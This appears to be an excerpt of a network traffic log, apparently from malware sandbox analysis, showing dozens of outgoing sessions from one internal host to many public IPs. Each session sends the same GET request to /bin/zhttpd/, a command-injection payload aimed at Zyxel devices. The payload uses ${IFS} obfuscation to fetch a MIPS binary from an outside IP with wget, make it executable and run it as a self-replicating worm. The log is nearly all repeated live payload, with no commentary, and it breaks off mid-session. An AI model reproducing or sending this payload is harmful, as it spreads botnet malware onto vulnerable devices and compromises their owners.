                                                  Jan 19, 2024 18:23:43.803992987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1542192.168.2.1335170111.84.11.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804059029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1543192.168.2.133688652.103.141.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804088116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1544192.168.2.13476988.26.119.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804131985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1545192.168.2.1343152157.26.142.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804147005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1546192.168.2.1355664120.108.205.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804176092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1547192.168.2.133413641.224.18.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804231882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1548192.168.2.134137460.117.169.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804255962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1549192.168.2.13499249.44.78.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804302931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1550192.168.2.134057675.162.187.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804333925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1551192.168.2.134245245.34.180.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804378033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1552192.168.2.135617632.27.131.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804404020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1553192.168.2.134765847.182.249.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804492950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1554192.168.2.135343219.40.142.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804497004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1555192.168.2.133326691.231.91.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804513931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1556192.168.2.1356844208.32.62.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804568052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1557192.168.2.1348256171.143.186.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804624081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1558192.168.2.135796263.62.188.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804647923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1559192.168.2.13444729.72.176.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804712057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1560192.168.2.1343730108.94.244.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804742098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1561192.168.2.1338920172.240.181.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804788113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1562192.168.2.136030636.104.9.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804840088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1563192.168.2.1354818139.255.206.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804925919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1564192.168.2.135221441.121.1.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804934025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1565192.168.2.1332834144.7.188.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804945946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1566192.168.2.135139879.114.82.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.804994106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1567192.168.2.1350778139.229.81.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805046082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1568192.168.2.135339895.136.214.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805083990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1569192.168.2.1345702202.90.104.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805109978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1570192.168.2.1337460200.75.43.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805155993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1571192.168.2.135457252.242.129.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805200100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1572192.168.2.1338066220.2.109.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805234909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1573192.168.2.134054446.100.16.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805279970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1574192.168.2.1349848213.45.183.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805294991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1575192.168.2.1344702148.239.83.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805346012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1576192.168.2.1341584213.132.2.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805367947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1577192.168.2.1346420203.123.1.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805396080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1578192.168.2.1337576108.13.215.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805408955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1579192.168.2.1347614202.208.22.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805473089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1580192.168.2.1346616119.43.192.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805489063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1581192.168.2.135155877.123.205.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805553913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1582192.168.2.1356470131.105.124.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805556059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1583192.168.2.1358940119.97.248.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805615902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1584192.168.2.1340016106.247.218.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805663109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1585192.168.2.13445069.208.43.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805699110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1586192.168.2.13474088.96.84.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805738926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1587192.168.2.1356116200.54.4.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805769920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1588192.168.2.1355522202.225.204.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805824041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1589192.168.2.135853670.45.124.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805855989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1590192.168.2.1355246194.244.209.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805898905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1591192.168.2.1344532157.209.199.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805941105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1592192.168.2.135094260.78.218.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.805990934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1593192.168.2.1347476161.122.143.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806039095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1594192.168.2.1335114168.126.148.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806092978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1595192.168.2.135052895.138.0.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806106091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1596192.168.2.1350888185.184.159.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806171894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1597192.168.2.134836035.245.90.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806200981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1598192.168.2.1343626122.78.63.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806232929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1599192.168.2.135803423.230.165.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806276083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1600192.168.2.134818483.76.182.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806328058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1601192.168.2.1348750174.66.149.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806372881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1602192.168.2.134829458.151.107.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806427002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1603192.168.2.1333182120.4.129.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806459904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1604192.168.2.1348164132.167.195.142443
                                                  TimestampBytes transferredDirectionData
